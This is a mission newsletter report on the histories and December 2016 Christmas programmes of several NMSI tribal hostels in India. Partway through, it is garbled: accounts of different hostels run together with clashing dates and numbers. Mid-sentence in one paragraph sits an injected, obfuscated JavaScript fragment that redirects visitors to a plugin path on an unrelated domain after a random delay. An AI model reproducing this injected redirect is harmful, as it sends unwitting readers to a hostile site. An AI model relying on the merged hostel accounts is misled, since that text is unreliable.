NMSI Hensman Tribal Girls Hostel, Pudur Nadu

The NMSI started mission work at Pudurnadu, Jawadhi hills in the year

1990, with the support of Kanyakumari Area committee. They constructed the Church in the same year for the spiritual nourishment of the local communities. In 1992 NMSI Hensman Tribal Girls Hostel – Pudur Nadu was started with 20 students with the great vision of giving better life to the tribal girls living in Jawadhi hills. Mrs.Kalyana Sundari served as the first warden in this hostel. Now we have 71 children from 6th to 12thStd with 2 wardens and 3 sub staff. Mrs. Sasi Manohari is working as a senior warden of this hostel.

The hostel children celebrated Christmas on 18th December, 2016. All the hostel children, parents and villagers participated in this program. The warden presided over the program which was assisted by Mrs. Irene. Rev. S. Christopher Vijayan, the General Secretary NMSI delivered the Christmas message on the theme FEAR NOT and distributed the Christmas gifts. “Christmas Vanthachu” was one of the attractive songs in the program performed by students. In addition to other songs, skits and dances were performed to articulate the birth of Jesus.

Mrs. Pusha Diraviyam faced great difficulties, when she served as its warden. Girls used to leave the hostel without in- forming the warden to their houses for the sake of Ragi porridge. After much prayer, in the year 1984 around 10 girls joined in the hostel. Now we have 88 children from 6th to 12thstd and Mrs.Jeeva Jamila is working as a warden with 4 sub staff.

S. Christopher Vijayan delivered the Christmas message and encouraged the children to grow in their spiritual and educational career. The cultural events were performed by the hostel children. The General Secretary and the members of the Coimbatore Area committee led by Mr. C. Johnson distributed the gifts to the hostel children and shared their greetings. Mr. Sampath James pronounced vote of thanks. The Christmas gifts were sponsored by the Co- imbatore Area committee.

NMSI Tribal Girls Hostel, Bijapur

NMSI Tribal girl’s hostel at Bijapur was started in the year 1997 in a rented building with a greater vision of educating the illiterate children living in that location. The hostel was started with the aim of giving education and better care for the Lambadi tribe. This tribe do not have native Script. Mr.George Bankapur took the initiative to begin this hostel. This hostel was started with 10 children and in another three months 40 children joined in the hostel. Mrs.Elizabeth Prabhudass served as a first warden. Now we have 35 children in this hostel. Mrs.Jasimine Emmanuel is working as the warden along with 1 sub staff.

The hostel  children  celebrated  Christmas  on  19th  December,  2016. Mrs.Jasmine Emmanuel  presided  over  the  function.  And  Mr.K.A.Emmanuel, Missionary   in   charge   offered   prayers.   Rev.Balraj,  CSI   Church,   Bijapur shared the word of God and spoke about the birth of Jesus. Children performed skits, dances and  action songs based on the birth  of Jesus Christ. Mr.Stanley. G.Bankapur   distributed   Christmas   gifts  to   all  the   children   and   special prizes for the children participated in the memory verse competition. Nearly 350 people gathered on that day for the Christmas celebrations.

Mr.Chinnasamy, Missionary served as its first warden. After completion of 3 years in Jamtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}unamarthur, the Tribal boy’s hostel was shifted to CK Ashram campus in the year 2000-2001. Mrs.Shantha Sanjeevi served as the warden with 40 children. Mr.GnanaSelvam, former student of this boarding school from Aratavadi Village, is now serving in the Indian Army as an officer. Now we have 22 boys, in this hostel from 6th to 12th Std. Mr.David- Vivekanadan is working as a warden with 1 sub staff.

The hostel children celebrated Christmas on 23rd December 2016. The hostel Warden, Mr.David Vivekanandan offered the opening prayer. Dr.G.D.Selvaraj delivered the Christmas message. Mr.T.Prabhakaran, distributed the Christmas gifts and the program ended with the love feast.

NMSI Tribal Girls Hostel, Nandyal

NMSI Tribal girl’s hostel was started on 2 August, 2010 with 35 students. Late Rev.I.Rajeshwara Rao took initiative to start this hostel for the benefit of tribal children in Nandyal. Ms. Ponnapatti Lingamma is serving as its warden. Now we have 35 students with 2 sub-staff.

The Nandyal hostel children celebrated Christmas on 12th December, 2016. Opening prayer was offered by Missionary In charge Mr. I. Yesurathinam. Er. M. M. Selvakumar, AGS (HQ) shared the word of God and explained the signif- icance of the birth of Jesus. The children performed different programs like action songs, dance and skits. Christmas gifts were distributed by Er. M. M. Selvakumar.

NMSI Tribal Boys Hostel, Burgayalakota

NMSI Tribal boy’s hostel Burgayalakotta was started with 26 students in the year 2011. Mr.Santhosh served as its warden. Now we have 22 boys, in this hos- tel. Mrs.Prasanthi Hezil is working as a warden with 2 sub staff.

The hostel children in Burkayalakota celebrated christmas on December

10, 2016. Mr.E.P.H.Daniel offered opening prayer. Mrs. Prasanthi Hezil, warden, read  the  scripture  portion   from  Mathew  1:18-21. Mr.  Israel,  Promotional coordinator, shared the word of God in Tamil and it was translated in English and Telugu on the theme Peace, Joy and Salvation. The hostel Children presented a cultural program and Christmas carols were sung by hostel children in Tamil and Telugu. Christmas cake cutting was done by the Hon. Treasurer Mr. D. Prabakar and he distributed Christmas gifts to all the children.  Mr. Manam Babu Rao pronounced vote of thanks. The program ended with prayer by the Treasurer, NMSI.
